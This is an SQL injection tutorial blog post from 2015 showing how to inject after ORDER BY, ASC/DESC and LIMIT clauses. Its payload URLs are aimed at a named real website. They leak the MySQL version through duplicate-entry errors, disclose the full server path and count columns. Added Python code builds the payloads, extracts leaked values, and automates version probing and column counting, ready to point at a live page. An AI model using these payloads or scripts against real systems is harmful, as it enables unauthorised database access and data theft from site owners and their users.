Sunday, 10 May 2015

Bypass 'Incorrect usage of UNION and ORDER BY'

This tutorial shows how to inject when the injection point comes after ORDER BY or LIMIT,
like this:

PHP Code:
SELECT * FROM page WHERE id=1 ORDER BY id [here] ASC [here] LIMIT 10,10 [here] 
[here] marks an injection point.
UNION cannot be used after these clauses, so we work with what the grammar still allows at each of those positions.

After ORDER BY id [here]:
using a double query (the duplicate-entry error).

If we have this site (thanks to Rohan_x):

Code:
http://www.teletec.com.pk/include/products.php?sb=id
the injection point is after ORDER BY.


I know I can use UNION at another injection point on this site; I use this one for the tutorial.
After ORDER BY it is simple. The only things we cannot use there are
UNION, HAVING, WHERE and a few more that do not matter.
AND still works, so we attach the double query with AND.

Code:
http://www.teletec.com.pk/include/products.php?sb=id and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
The duplicate-entry error leaks the value: '5.0.95-community'



(I used the table 'products' because an earlier error showed that this table exists. If you cannot see any table name, use information_schema.columns: it always exists and has the three or more rows the double query needs.)

After DESC/ASC [here]:
using a double query.

If we have this site:
Code:
http://www.teletec.com.pk/include/products.php?sb=id desc'
the injection point is after DESC (the stray quote just triggers the error).


After DESC/ASC it is a little more work, because we cannot use
UNION, HAVING, WHERE, AND, OR, XOR, *, > or any other operator, so nothing can be appended directly.
What the grammar does accept there is a comma followed by another sort expression, so we add a comma and put the double query after it.

Code:
http://www.teletec.com.pk/include/products.php?sb=id desc,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
The duplicate-entry error leaks the value: '5.0.95-community'


Note: if the injection point looks like this:
PHP Code:
SELECT * FROM page WHERE id=1 ORDER BY [here] id 
just prefix a 1 and inject as in the first example:
Code:
1 and (select count(*) from products group by concat(version(),0x27202020,floor(rand(0)*2-1)))--
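The three payload shapes above differ only in where the same double-query subquery is placed, and the part that matters in practice is reading the leaked value back out of the Duplicate entry message. The following is an added Python example, not code from Benzi's tutorial: it builds the subquery for each of the three positions and parses the value out of a MySQL error 1062 message. The separator 0x27202020 and the rand(0) trick are the tutorial's; the function names are mine, the comment closer is written as "-- -" rather than the tutorial's bare "--", and the error string in the main block is a constructed sample, not captured output.

```python
import re

# The tutorial's separator 0x27202020 decodes to "'   " (a quote and three
# spaces); it makes the leaked value easy to spot inside the error message.
SEPARATOR_HEX = "0x27202020"
SEPARATOR = "'   "


def double_query(expr, table="information_schema.columns"):
    """Return the duplicate-entry subquery that leaks the value of expr.

    GROUP BY evaluates its key more than once per row, and rand(0) is a
    fixed sequence, so by the third row the same key is inserted twice and
    MySQL aborts with error 1062 'Duplicate entry <key>'. Any table with at
    least three rows works; information_schema.columns always has them.
    """
    return "(select count(*) from %s group by concat(%s,%s,floor(rand(0)*2-1)))" % (
        table, expr, SEPARATOR_HEX)


def payload(position, expr, table="information_schema.columns", column="id"):
    """Place the subquery according to where the input lands in the query.

    position is one of (hypothetical names, chosen for this example):
      "after_order_by"  ... ORDER BY id [here]        -> AND (subquery)
      "after_asc_desc"  ... ORDER BY id DESC [here]   -> ,(subquery)
      "before_column"   ... ORDER BY [here] id        -> 1 AND (subquery)
    The comment closer is written as "-- -" because MySQL only treats "--"
    as a comment when a whitespace character follows it.
    """
    sub = double_query(expr, table)
    if position == "after_order_by":
        return "%s and %s-- -" % (column, sub)
    if position == "after_asc_desc":
        # Only another sort expression is legal here, so use a comma.
        return "%s desc,%s" % (column, sub)
    if position == "before_column":
        return "1 and %s-- -" % sub
    raise ValueError("unknown position: %r" % (position,))


# Matches the leaked value between "Duplicate entry '" and the separator.
_LEAK = re.compile(r"Duplicate entry '(.*?)" + re.escape(SEPARATOR))


def extract_leak(error_text):
    """Pull the leaked value out of a MySQL 1062 message, or None if absent.

    The group key shown in the message is truncated, so a long value has to
    be read in slices, e.g. substr(expr,1,60), substr(expr,61,60), ...
    """
    m = _LEAK.search(error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed sample of the error the page would show; not captured output.
    sample = "Duplicate entry '5.0.95-community'   0' for key 'group_key'"
    print(payload("after_order_by", "version()", "products"))
    print(extract_leak(sample))
```

To leak something other than the version, pass a different expression, for example `(select table_name from information_schema.tables limit 0,1)`, and keep slicing with substr() once the value is longer than what the error message shows.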

After LIMIT 10,10 [here]:
using some tricks.

Like this site:
Code:
http://www.teletec.com.pk/include/products.php?rw=10
the injection point is after the LIMIT clause.


When the injection point is after the LIMIT clause there is very little left to work with; the only things the grammar accepts there are
OFFSET (after a single-value LIMIT), INTO (including INTO OUTFILE/DUMPFILE), PROCEDURE, /*! */ versioned comments, FOR UPDATE and LOCK IN SHARE MODE.
So we exploit what we can.
Contents:
get the version
full path disclosure
find the column count

Get the version (thanks to lolalu0)
We can use versioned comments to get the MySQL version: the body of /*!NNNNN ... */ is executed only when the server version is at least NNNNN.
Put garbage in the body and guess the number. If the guess is at or below the real version, the garbage is executed, the query breaks and the page does not load; if it is above, the comment is skipped and the page loads normally. It is a guessing game like blind injection, but the oracle is the version comparison.
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50094aaaa*/
page does not load: version is at least 5.0.94
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50096aaaa*/
page loads normally: version is lower than 5.0.96
Code:
http://www.teletec.com.pk/include/products.php?rw=10 /*!50095aaaa*/
page does not load: version is at least 5.0.95, so together with the previous result it is exactly 5.0.95.

FPD
For Full Path Disclosure we can put 0 or /**/ into the LIMIT clause. The query then returns no rows (or the parameter stops being a number), and the PHP code that does arithmetic with the result throws a warning containing the full path. Because it is a PHP warning rather than a MySQL error, it appears even when MySQL errors are not displayed.
for example
Code:
http://www.teletec.com.pk/include/products.php?rw=0
final query-
PHP Code:
select * from....limit 0,0 
and we can also make the parameter non-numeric:
Code:
http://www.teletec.com.pk/include/products.php?rw=/**/1
Warning: Division by zero in /home/teletec/public_html/include/products.php on line 164

Find the column count
using INTO.
It will not really help at this point, but it is a nice trick.
If we have this site:
Code:
http://www.teletec.com.pk/include/products.php?rw=10
the injection point is after LIMIT.
We can count the columns like this:
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @


error 1222 (the used SELECT statements have a different number of columns):
not 1 column.
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @,@


error 1222 again:
not 2 columns.

and so on, until:
Code:
http://www.teletec.com.pk/include/products.php?rw=10 into @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@

error 1172 "Result consisted of more than one row".
The variable count now matches, and the complaint has moved to the row count (LIMIT 10,10 returns more than one row), so there are 60 columns.
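Both LIMIT-clause tricks above are oracle games: the versioned comment answers "is the server at least version NNNNN?", and INTO @,@,... answers "does the variable count match the column count?". As an added example (my code, not the tutorial's), the following Python turns them into loops and goes a step beyond the text: a binary search over the version number instead of guessing one value at a time, and a column counter that stops at the first error that is not 1222. The FakeTarget class is a constructed stand-in that emulates the behaviour the tutorial observed (MySQL 5.0.95, 60 columns, 10 rows returned); against a real page, its run() would be replaced by a function that sends the request and classifies the response.

```python
import re


class FakeTarget:
    """Constructed stand-in for the vulnerable page (no real server involved).

    Emulates a MySQL 5.0.95 server whose query ends in 'LIMIT 10,10 [input]',
    returns 10 rows of 60 columns, and reports the MySQL error number that
    the real page would display (0 when the page loads normally).
    """
    VERSION = 50095   # 5.0.95 written the way /*!NNNNN */ comments expect it
    COLUMNS = 60
    ROWS = 10

    def run(self, tail):
        """Return 0 if the query still parses and runs, else the error number."""
        m = re.fullmatch(r"\s*/\*!(\d{5})(\w*)\*/\s*", tail)
        if m:
            # The comment body is executed only when server >= NNNNN;
            # a garbage body then becomes a syntax error (1064).
            if self.VERSION >= int(m.group(1)) and m.group(2):
                return 1064
            return 0
        m = re.fullmatch(r"\s*into\s+(@\w*(?:,@\w*)*)\s*", tail, re.IGNORECASE)
        if m:
            if m.group(1).count("@") != self.COLUMNS:
                return 1222   # the used SELECT statements have a different number of columns
            return 1172 if self.ROWS > 1 else 0   # result consisted of more than one row
        return 1064 if tail.strip() else 0


def version_comment(n):
    """Build the probe: its body is executed (and breaks the query) only when server >= n."""
    return "/*!%05daaaa*/" % n


def probe_version(run, lo=40000, hi=99999):
    """Binary-search the server version with versioned comments.

    run(tail) returns 0 when the page loads and non-zero when it breaks.
    A broken page means the body was executed, i.e. version >= NNNNN, so
    the search keeps the invariant lo <= version <= hi. Returns a
    (major, minor, patch) tuple.
    """
    if run(version_comment(lo)) == 0:
        raise RuntimeError("server is older than the search floor")
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if run(version_comment(mid)) != 0:
            lo = mid          # version >= mid
        else:
            hi = mid - 1      # version <  mid
    return (lo // 10000, (lo // 100) % 100, lo % 100)


def count_columns(run, max_columns=100):
    """Count the SELECT's columns with 'INTO @,@,...'.

    Error 1222 means the variable count does not match; 1172 (or success)
    means it does. Returns the count, or None if max_columns is reached.
    """
    for n in range(1, max_columns + 1):
        err = run("into " + ",".join(["@"] * n))
        if err in (0, 1172):
            return n
        if err != 1222:
            raise RuntimeError("unexpected error %d with %d variables" % (err, n))
    return None


if __name__ == "__main__":
    target = FakeTarget()
    print(probe_version(target.run))   # (5, 0, 95)
    print(count_columns(target.run))   # 60
```

The binary search needs about 16 requests for the whole five-digit range instead of one request per guess, and the same run() callback serves both probes, so a real oracle only has to be written once.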

Hope you learned something.

Author ::: Benzi

